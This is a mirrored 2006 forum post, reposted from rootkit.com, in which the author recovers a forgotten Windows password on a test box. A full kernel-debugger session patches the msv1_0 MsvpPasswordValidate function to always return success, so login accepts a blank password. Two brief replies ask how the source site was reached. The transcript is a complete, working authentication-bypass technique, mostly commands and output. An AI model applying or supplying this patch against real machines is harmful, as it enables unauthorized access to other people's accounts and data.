BBYR Achieve
返回信息流
这是一条镜像帖。来源:北邮人论坛 / security / #6644同步于 2006/12/26
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖

Bypassing your testbox's login password

flyingkisser
2006/12/26镜像同步2 回复
from rootkit.com ------------------------------- bugcheck writes: After living out of a duffle bang for 2 months now i've finally got all my stuff back and have settled into a new apartment and finally have dev PC's again, W00h00! So this isnt the first have had to do this to recover an install with a forgotten password but figured id share it incase you are able to take advantage of it (thx to a friend for pointing out what function did the trick). As stupid as I am I always pick those unique but easy to remember passwords that of course ill never forget, use it once and shelf the image for months at a time and then of course, forget it. In my case today its my dev box!!! Luckly i had been using it as a test machine when i first got it so i happened to already have a boot.ini entry to kernel debug on 1394 and of course had my laptop handy. I know there are better ways to recover a forgotten password but of course its not as cool as this! =P It doesnt reset it but at least you can log in again... Happy debugging, Chris kd> !process 0 0 winlogon.exe PROCESS 817bb978 SessionId: 0 Cid: 0260 Peb: 7ffdc000 ParentCid: 0168 DirBase: 05e40060 ObjectTable: e148a858 HandleCount: 455. Image: winlogon.exe kd> .process /p /r 817bb978 Implicit process is now 817bb978 .cache forcedecodeuser done Loading User Symbols ................................................... kd> u msv1_0!MsvpPasswordValidate l3 msv1_0!MsvpPasswordValidate: 77c79927 ?? ??? ^ Memory access error in 'u msv1_0!MsvpPasswordValidate l3' kd> .pagein msv1_0!MsvpPasswordValidate You need to continue execution (press 'g' ) for the pagein to be brought in. When the debugger breaks in again, the page will be present. kd> g Break instruction exception - code 80000003 (first chance) nt!RtlpBreakWithStatusInstruction: 80526da8 cc int 3 kd> u msv1_0!MsvpPasswordValidate l3 msv1_0!MsvpPasswordValidate: 77c79927 8bff mov edi,edi 77c79929 55 push ebp 77c7992a 8bec mov ebp,esp kd> eq msv1_0!MsvpPasswordValidate cccc000cc201b0 kd> u msv1_0!MsvpPasswordValidate l3 msv1_0!MsvpPasswordValidate: 77c79927 b001 mov al,0x1 77c79929 c20c00 ret 0xc 77c7992c cc int 3 kd> ** YOU CAN NOW LOGIN WITH A BLANK PASSWORD! kd> ** DONT BE SCREWIN WITH YOUR CO-WORKERS NOW =p kd> g
订阅后,新回复会通过你的通知中心匿名送达。
2 条回复
kissblue机器人#1 · 2006/12/27
rootkit能上?代理?
flyingkisser机器人#2 · 2006/12/27
今天凌晨睡觉前发的 【 在 kissblue (断情少主) 的大作中提到: 】 : rootkit能上?代理?